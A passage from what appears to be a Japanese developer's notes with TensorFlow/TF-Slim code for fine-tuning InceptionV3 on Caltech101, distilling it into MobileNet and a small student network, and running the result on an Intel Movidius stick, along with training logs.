shape=[None, N_CLASSES], name="Y") tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha") tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training") stu_keep_prob_conv = tf.placeholder(tf.float32) stu_keep_prob_hidden = tf.placeholder(tf.float32) # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") scaled_inputs = tf_X # BODY arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3( scaled_inputs, num_classes=N_CLASSES, is_training=tf_is_training, dropout_keep_prob=0.8) with tf.name_scope("softmax") as scope: tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax") tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual") # Student # stu_logits = NetworkStudent(scaled_inputs, stu_keep_prob_conv, # stu_keep_prob_hidden, scope='student') # with tf.name_scope("stu_struct"): # # softmax # stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax") # stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax") mbnet_logits, mbnet_end_point = NetworkStudent2( scaled_inputs, tf_is_training=tf_is_training, scope='mbnet') with tf.name_scope("mbnet_struct"): # softmax mbnet_y = tf.nn.softmax(mbnet_logits/temperature, name="softmax") mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax") # Seperate vars model_vars = tf.trainable_variables() var_teacher = [var for var in model_vars if 'InceptionV3' in var.name] #var_student = [var for var in model_vars if 'student' in var.name] save_vars = tf.global_variables() var_mbnet = [var for var in save_vars if 'MobilenetV1' in var.name] # PREDICTIONS tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds") # LOSS - Sums all losses (even Regularization losses) with tf.variable_scope('loss') as scope: #unrolled_labels = tf.reshape(tf_Y, (-1,)) #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels, #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits) #tf_loss = tf.losses.get_total_loss() tf_loss = loss(tch_y_actual, tf_Y) # OPTIMIZATION - Also updates batchnorm operations automatically with tf.variable_scope('opt') as scope: #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm #with tf.control_dependencies(update_ops): # tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op") grad_teacher = tf.gradients(tf_loss, var_teacher) tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher)) # Evaluation with tf.variable_scope('eval') as scope: y = tf.nn.softmax(tf_logits, name='softmax') accuracy = tf.reduce_mean( tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32) ) # PRETRAINED SAVER SETTINGS # Lists of scopes of weights to include/exclude from pretrained snapshot pretrained_include = ["InceptionV3"] pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"] # PRETRAINED SAVER - For loading pretrained weights on the first run pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=pretrained_include, exclude=pretrained_exclude) tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver") mbnet_pretrained_include = ["MobilenetV1"] mbnet_pretrained_exclude = ["MobilenetV1/Predictions", "MobilenetV1/Logits"] mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=mbnet_pretrained_include, exclude=mbnet_pretrained_exclude) mbnet_pretrained_saver = tf.train.Saver( mbnet_pretrained_vars, name="mobilenet_pretrained_saver") # Student # with tf.name_scope("stu_train"): # # loss # #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits) # #stu_loss1 = tf.losses.get_total_loss() # stu_loss1 = loss(stu_y_actual, tf_Y) # stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log( # tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1)) # stu_loss = 0.4 * stu_loss1 + stu_loss2 # #stu_loss = stu_loss1 # # optimization # grad_student = tf.gradients(stu_loss,var_student) # stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002) # #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") # #stu_trainer = tf.train.AdadeltaOptimizer() # train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student)) # #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer") # #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op") # # evaluation # stu_accuracy = tf.reduce_mean( # tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32) # ) # Mobilenet V1 with tf.name_scope("mbnet_train"): # loss #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=mbnet_logits) #mbnet_loss1 = tf.losses.get_total_loss() mbnet_loss1 = loss(mbnet_y_actual, tf_Y) mbnet_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log( tf.clip_by_value(mbnet_y, 1e-10,1.0)), reduction_indices=1)) mbnet_loss = 0.4 * mbnet_loss1 + mbnet_loss2 #mbnet_loss = mbnet_loss1 # optimization grad_mbnet = tf.gradients(mbnet_loss,var_mbnet) mbnet_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002) train_step_mbnet = mbnet_trainer.apply_gradients(zip(grad_mbnet, var_mbnet)) # evaluation mbnet_accuracy = tf.reduce_mean( tf.cast(tf.equal( tf.argmax(mbnet_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32) ) # MAIN SAVER - For saving/restoring your complete model tf_saver = tf.train.Saver(var_teacher, name="saver") # STUDENT SAVER #stu_saver = tf.train.Saver(var_student, name="stu_saver") mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver") # TENSORBOARD - To visialize the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[8]: def initialize_vars(session): # INITIALIZE VARS LOAD_FROM_CHECKPOINT = False if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE): print(" Loading from Main Checkpoint") session.run(tf.global_variables_initializer()) tf_saver.restore(session, SNAPSHOT_FILE) else: print("Initializing from Pretrained Weights") session.run(tf.global_variables_initializer()) tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE) mbnet_pretrained_saver.restore(session, PRETRAINED_MOBILENET_FILE) # In[9]: with tf.Session(graph=graph) as sess: n_epochs = 2 batch_size = 32 # small batch size so inception v3 can be run on laptops steps_per_epoch = len(X_train)//batch_size steps_per_epoch_val = len(X_test)//batch_size initialize_vars(session=sess) """ try: print("#### Debuggin Section ####") ep2 = sess.run(stu2_end_point, feed_dict = {tf_X: [X_train[0]], tf_Y: [Y_train[0]], tf_is_training: True}) print("EP2 : ", ep2.keys()) print("shape of logits: ", ep2['Logits'].shape) print("shape of prediction: ", ep2['Predictions'].shape) #print("pretrained_vars: ", mbnet_pretrained_vars)""" print("##### Teacher Training Section #####") for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') ## TRAINING for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: True} #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict) tf_train_step.run(feed_dict=feed_dict) ## EVALUATE val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: False} val_accuracy.append(accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) pre_logits, pre_loss = sess.run([tch_y, tf_loss], feed_dict = { tf_X: [X_test[5]], tf_Y: [Y_test[5]], tf_is_training: False }) print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy)) plt.plot(pre_logits[0]) plt.show() # SAVE SNAPSHOT - after each epoch tf_saver.save(sess, SNAPSHOT_FILE) print("### Student Training Section ###") n_epochs = 30 steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG steps_per_epoch_val = len(X_test)//batch_size print("/////////////////////////////////////////////////////////") for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') ## TRAINING for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_is_training: True} train_step_mbnet.run(feed_dict=feed_dict) ## EVALUATE val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_is_training: False} val_accuracy.append(mbnet_accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) pre_logits, pre_loss = sess.run([mbnet_logits, mbnet_loss], feed_dict = { tf_X: X_batch, tf_Y: Y_batch, tf_is_training: False }) print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy)) plt.plot(pre_logits[0]) plt.show() mbnet_saver.save(sess, MBNET_SNAPSHOT_FILE) # In[10]: end = time.time() print("Time : {0}".format(end-start)) # In[ ]: # In[ ]:
変換用
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time,glob,sys os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim import tensorflow.contrib.slim.nets import nets.mobilenet_v1 # In[2]: MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt" MBNET_FLOZEN_FILE = "./models/mbnet_flozen.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" [os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))] # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [224,224] # Dimensions required by inception V3 N_CHANNELS = 3 # Number of channels required by inception V3 N_CLASSES = 101 # Change N_CLASSES to suit your needs temperature = 20 # In[3]: def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False): #with tf.variable_scope(scope, reuse = reuse) as sc: arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1( scaled_inputs, num_classes=N_CLASSES, is_training=False)#, #depth_multiplier=1.0) return stu2_logits, stu2_end_points # In[4]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") scaled_inputs = tf_X # Student mbnet_logits, mbnet_end_point = NetworkStudent2(scaled_inputs, scope='mbnet') with tf.name_scope("mbnet_struct"): # softmax mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax") # Seperate vars model_vars = tf.trainable_variables() var_mbnet = [var for var in model_vars if 'MobilenetV1' in var.name] # parameter total_parameters = 0 for variable in tf.trainable_variables(): # shape is an array of tf.Dimension shape = variable.get_shape() #print(shape) #print(len(shape)) variable_parameters = 1 for dim in shape: #print(dim) variable_parameters *= dim.value #print(variable_parameters) total_parameters += variable_parameters print("total params: ",total_parameters) # STUDENT SAVER #mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver") mbnet_saver = tf.train.Saver(tf.global_variables(), name="mbnet_saver") # TENSORBOARD - To visialize the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[5]: with tf.Session(graph=graph) as sess: sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) mbnet_saver.restore(sess, MBNET_SNAPSHOT_FILE) #sess.run(tf.initialize_all_variables()) mbnet_saver.save(sess, MBNET_FLOZEN_FILE)
loadimg
#!/usr/bin/env python2 import os import numpy as np import tensorflow as tf from keras.preprocessing.image import load_img, img_to_array from keras.utils import np_utils import matplotlib.pyplot as plt import glob from sklearn.model_selection import train_test_split IMGSIZE = 224 IMGSIZE = 224 def loadimg_one(DIRPATH, NUM): x = [] y = [] img_list = os.listdir(DIRPATH) img_list = sorted(img_list) if (NUM) and (len(img_list) > NUM): img_list = img_list[:NUM] #print("[loadimg] : img_list : ", end=' ') #print(img_list) with open('categories.txt', 'w') as f: f.write('\n'.join(img_list)) f.write('\n') img_count = 0 for number in img_list: dirpath = os.path.join(DIRPATH, number) dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg')) dirpic_list += glob.glob(os.path.join(dirpath, '*.png')) for picture in dirpic_list: #img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE))) img = img_to_array(load_img(picture, target_size=(IMGSIZE, IMGSIZE))) x.append(img) y.append(img_count) #print("Load {0} : {1}".format(picture, img_count)) img_count += 1 output_count = img_count x = np.asarray(x) x = x.astype('float32') x = x/255.0 y = np.asarray(y, dtype=np.int32) y = np_utils.to_categorical(y, output_count) return x, y, output_count def loadimg(COMMONDIR='./', NUM=None): print("########## loadimg ########") #COMMONDIR = './make_image' #TRAINDIR = os.path.join(COMMONDIR, 'train') #TESTDIR = os.path.join(COMMONDIR, 'test') x, y, class_count = loadimg_one(COMMONDIR, NUM) #x_test, y_test, _ = loadimg_one(TESTDIR, NUM) #for i in range(0, x_test.shape[0]): # plt.imshow(x_test[i]) # plt.show() #x = np.concatenate((x_train, x_test)) #x = np.reshape(x, [-1, 784]) #y = np.concatenate((y_train, y_test)) print("x_train, y_train, x_test, y_test, class_count") print("x_train shape : ", x.shape) print("########## END of loadimg ########") x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.8, test_size=0.2) return x_train, y_train, x_test, y_test, class_count if __name__ == '__main__': loadimg()
Movidius
import mvnc.mvncapi as mvnc import numpy as np from PIL import Image import cv2 import time, sys, os import glob IMAGE_DIR_NAME = '/home/tokunn/caltech101' if (len(sys.argv) > 1): IMAGE_DIR_NAME = sys.argv[1] #IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images' CATEGORIES_FILE = './categories.txt' with open(CATEGORIES_FILE, 'r') as f: categories = f.read().split('\n') def predict(input): print("Start predicting ...") devices = mvnc.EnumerateDevices() device = mvnc.Device(devices[0]) device.OpenDevice() # Load graph file data with open('./models/graph', 'rb') as f: graph_file_buffer = f.read() # Initialize a Graph object graph = device.AllocateGraph(graph_file_buffer) predict = [] start = time.time() for i in range(len(input)): # Write the tensor to the input_fifo and queue an inference graph.LoadTensor(input[i], None) output, userobj = graph.GetResult() predict.append(np.argmax(output)) stop = time.time() for i in predict: print(categories[i], end=' ', flush=True) print('') print("Time : {0} ({1} images)".format(stop-start, len(input))) graph.DeallocateGraph() device.CloseDevice() return output if __name__ == '__main__': print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png'))) jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg')) jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png')) if not len(jpg_list): print("No image file") sys.exit() jpg_list.reverse() print([i.split('/')[-1] for i in jpg_list][:10]) img_list = [] for n in jpg_list: image = cv2.imread(n) image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) image = cv2.resize(image, (224, 224)) img_list.append(image) img_list = np.asarray(img_list) * (1.0/255.0) #img_list = np.reshape(img_list, [-1, 784]) print("imgshape ", img_list.shape) predict(img_list.astype(np.float16))
Fine-Tuning InceptionV3
ImageNetで学習済みのInceptionV3をCaltech101にFine-Tuningする。
サイトに従ってFine-Tuning
参考 http://ronny.rest/blog/post_2017_10_13_tf_transfer_learning/
やってみる。
Inception V3の学習済みモデルはいつも通り https://github.com/tensorflow/models/tree/master/research/slim から http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gzls を選択
入出力
入力: Caltech101
出力:101
バッチサイズ:32
結果
できた
Initializing from Pretrained Weights INFO:tensorflow:Restoring parameters from ./models/inception_v3.ckpt ---------------------------------------------- EPOCH 1/20 100%|██████████| 216/216 [01:45<00:00, 2.41it/s] 100%|██████████| 54/54 [00:07<00:00, 8.15it/s] step: 53 loss: 0.3671 val accuracy: 0.8681 ---------------------------------------------- EPOCH 2/20 100%|██████████| 216/216 [01:29<00:00, 2.41it/s] 100%|██████████| 54/54 [00:06<00:00, 8.13it/s] step: 53 loss: 0.2679 val accuracy: 0.9236 ---------------------------------------------- EPOCH 19/20 100%|██████████| 216/216 [01:31<00:00, 2.34it/s] 100%|██████████| 54/54 [00:06<00:00, 7.97it/s] step: 53 loss: 0.2040 val accuracy: 0.9659 ---------------------------------------------- EPOCH 20/20 100%|██████████| 216/216 [01:31<00:00, 2.37it/s] 100%|██████████| 54/54 [00:06<00:00, 8.05it/s] step: 53 loss: 0.2002 val accuracy: 0.9653
ソースコード
サイトに従ったコードをナンバー用に変更したもの
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim import tensorflow.contrib.slim.nets #from __future__ import print_function, division import loadimg from tqdm import tqdm import matplotlib.pyplot as plt start = time.time() # In[2]: np_aryname = './models/data{0}.npy' SAVE = False if SAVE: X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg( '/home/tokunn/caltech101') np.save(np_aryname.format('X_train'), X_train) np.save(np_aryname.format('Y_train'), Y_train) np.save(np_aryname.format('X_test'), X_test) np.save(np_aryname.format('Y_test'), Y_test) np.save(np_aryname.format('number_of_classes'), number_of_classes) else: # LOAD X_train = np.load(np_aryname.format('X_train')) Y_train = np.load(np_aryname.format('Y_train')) X_test = np.load(np_aryname.format('X_test')) Y_test = np.load(np_aryname.format('Y_test')) number_of_classes = np.load(np_aryname.format('number_of_classes')) print("X_train", X_train.shape) print("Y_train", Y_train.shape) print("X_test", X_test.shape) print("Y_test", Y_test.shape) print("Number of Classes", number_of_classes) # In[3]: SNAPSHOT_FILE = "./models/snapshot.ckpt" PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3 N_CHANNELS = 3 # Number of channels required by inception V3 N_CLASSES = number_of_classes # Change N_CLASSES to suit your needs # In[4]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") tf_Y = tf.placeholder(tf.int32, shape=[None], name="Y") tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha") tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training") # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") # BODY arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3( scaled_inputs, num_classes=N_CLASSES, is_training=tf_is_training, dropout_keep_prob=0.8) # PREDICTIONS tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds") # LOSS - Sums all losses (even Regularization losses) with tf.variable_scope('loss') as scope: unrolled_labels = tf.reshape(tf_Y, (-1,)) tf.losses.sparse_softmax_cross_entropy(labels=unrolled_labels, logits=tf_logits) tf_loss = tf.losses.get_total_loss() # OPTIMIZATION - Also updates batchnorm operations automatically with tf.variable_scope('opt') as scope: tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm with tf.control_dependencies(update_ops): tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op") # Evalution with tf.variable_scope('eval') as scope: y = tf.nn.softmax(tf_logits, name='softmax') accuracy = tf.reduce_mean( tf.cast(tf.equal(tf.argmax(y, 1), tf.cast(tf_Y, tf.int64)), tf.float32) ) # PRETRAINED SAVER SETTINGS # Lists of scopes of weights to include/exclude from pretrained snapshot pretrained_include = ["InceptionV3"] pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"] # PRETRAINED SAVER - For loading pretrained weights on the first run pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=pretrained_include, exclude=pretrained_exclude) tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver") # MAIN SAVER - For saving/restoring your complete model tf_saver = tf.train.Saver(name="saver") # TENSORBOARD - To visialize the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[5]: def initialize_vars(session): # INITIALIZE VARS if False: #tf.train.checkpoint_exists(SNAPSHOT_FILE): print(" Loading from Main Checkpoint") tf_saver.restore(session, SNAPSHOT_FILE) else: print("Initializing from Pretrained Weights") session.run(tf.global_variables_initializer()) tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE) # In[ ]: with tf.Session(graph=graph) as sess: n_epochs = 20 print_every = 32 batch_size = 32 # small batch size so inception v3 can be run on laptops steps_per_epoch = len(X_train)//batch_size steps_per_epoch_val = len(X_test)//batch_size initialize_vars(session=sess) for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') #print("----------------------------------------------", flush=True) for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: True} loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict) val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: False} val_accuracy.append(accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) print("\tstep: {: 4d} loss: {:0.4f} val accuracy: {:0.4f}".format( step, loss, total_val_accuracy)) plt.plot(sess.run(tf_logits, feed_dict = { tf_X: [X_test[0]], tf_Y: [Y_test[0]], tf_is_training: False })[0]) # SAVE SNAPSHOT - after each epoch tf_saver.save(sess, SNAPSHOT_FILE) # In[ ]: end = time.time() print("Time : {0}".format(end-start)) # In[ ]: plt.show()
TensorFlow Slim (TF-Slim)で書いたモデルをMovidiusで動かす & 蒸留もどき
TF-Slimとは
TensorFlow Low Layerのマクロみたいなもの 。 比較的簡単に書けるようになる。
変数の定義
weights = slim.model_variable('weights', shape=[10, 10, 3 , 3]) my_var = slim.variable('my_var', shape=[20, 1], initializer=tf.zeros_initializer())
レイヤの追加
net = slim.conv2d(input, 128, [3, 3], scope='conv1_1')
Layer | TF-Slim |
---|---|
BiasAdd | slim.bias_add |
BatchNorm | slim.batch_norm |
Conv2d | slim.conv2d |
Conv2dInPlane | slim.conv2d_in_plane |
Conv2dTranspose (Deconv) | slim.conv2d_transpose |
FullyConnected | slim.fully_connected |
AvgPool2D | slim.avg_pool2d |
Dropout | slim.dropout |
Flatten | slim.flatten |
MaxPool2D | slim.max_pool2d |
OneHotEncoding | slim.one_hot_encoding |
SeparableConv2 | slim.separable_conv2d |
UnitNorm | slim.unit_norm |
サンプル
import numpy as np import tensorflow as tf from tensorflow.contrib.slim.nets import inception slim = tf.contrib.slim def run(name, image_size, num_classes): with tf.Graph().as_default(): image = tf.placeholder("float", [1, image_size, image_size, 3], name="input") with slim.arg_scope(inception.inception_v1_arg_scope()): logits, _ = inception.inception_v1(image, num_classes, is_training=False, spatial_squeeze=False) probabilities = tf.nn.softmax(logits) init_fn = slim.assign_from_checkpoint_fn('inception_v1.ckpt', slim.get_model_variables('InceptionV1')) with tf.Session() as sess: init_fn(sess) saver = tf.train.Saver(tf.global_variables()) saver.save(sess, "output/"+name) run('inception-v1', 224, 1001)
TF-Slim を用いた蒸留
拾ってきたソースコードつなぎ合わせて無理やり動かしたらかろうじて動いたレベル
ナンバープレート画像を用いて全結合のみに蒸留
蒸留したものをMovidiusに変換
graphでoutput nodeを確認する
fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()
tensorboard --logdir logs
コンパイル
mvNCCompile -s 12 student_flozen.ckpt.meta -in=input -on=output -o graph
実行
tokunn@nanase 1:18:01 [~/Documents/distil_mnist/second_challenge] $ python3 movidius.py /home/tokunn/make_image/test/3186 2>/dev/null Image path : /home/tokunn/make_image/test/3186/*.jpg or *.png ['extend_5_0_5934.png', 'extend_9_0_1460.png', 'extend_9_0_6437.png', 'extend_9_0_733.png', 'extend_13_0_8860.png', 'extend_5_0_1296.png', 'extend_5_0_320.png', 'extend_5_0_2227.png', 'extend_5_0_6957.png', 'extend_1_0_2447.png'] imgshape (25, 784) Start prediting ... 1 7 7 7 6 7 7 7 7 8 1 7 7 7 7 7 7 2 2 7 7 3 9 1 2 Time : 0.10333132743835449 (25 images)
思ったよりすんなり動いた
ソースコード
ナンバー親子
#!/usr/bin/env python # coding: utf-8 # In[1]: import os os.environ['TF_CPP_MIN_LOG_LEVEL']='2' os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim from tensorflow.examples.tutorials.mnist import input_data import loadimg # In[2]: #config = tf.ConfigProto() #config.gpu_options.per_process_gpu_memory_fraction = 0.25 #sess = tf.Session(config=config) config = tf.ConfigProto( gpu_options=tf.GPUOptions( visible_device_list="1", # specify GPU number allow_growth=False ) ) #sess = tf.Session(config=config) # In[3]: NUMBER_OF_CLASS = 10 # In[4]: def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False): with tf.variable_scope(scope,reuse = reuse) as sc : with slim.arg_scope([slim.conv2d], kernel_size = [3,3], stride = [1,1], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu): net = slim.conv2d(input, 32, scope='conv1') net = slim.max_pool2d(net,[2, 2], 2, scope='pool1') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 64,scope='conv2') net = slim.max_pool2d(net,[2, 2], 2, scope='pool2') net = tf.nn.dropout(net, keep_prob_conv) net = slim.conv2d(net, 128,scope='conv3') net = slim.max_pool2d(net,[2, 2], 2, scope='pool3') net = tf.nn.dropout(net, keep_prob_conv) net = slim.flatten(net) with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.relu) : net = slim.fully_connected(net,625,scope='fc1') net = tf.nn.dropout(net, keep_prob_hidden) net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2') net = tf.nn.softmax(net/temperature) return net # In[5]: def MnistNetworkStudent(input,scope='Mnist',reuse = False): with tf.variable_scope(scope,reuse = reuse) as sc : with slim.arg_scope([slim.fully_connected], biases_initializer=tf.constant_initializer(0.0), activation_fn=tf.nn.sigmoid): net = slim.fully_connected(input,1000,scope = 'fc1') net = slim.fully_connected(net, NUMBER_OF_CLASS, activation_fn = None, scope = 'fc2') return net # In[6]: def loss(prediction,output,temperature = 1): cross_entropy = tf.reduce_mean(-tf.reduce_sum( output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)), reduction_indices=[1])) correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) return cross_entropy,accuracy # In[7]: eps = 0.1 alpha = 0.5 temperature = 1 start_lr = 1e-4 decay = 1e-6 # In[8]: with tf.Graph().as_default(): x = tf.placeholder(tf.float32, shape=[None, 784], name='input') y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS]) keep_prob_conv = tf.placeholder(tf.float32) keep_prob_hidden = 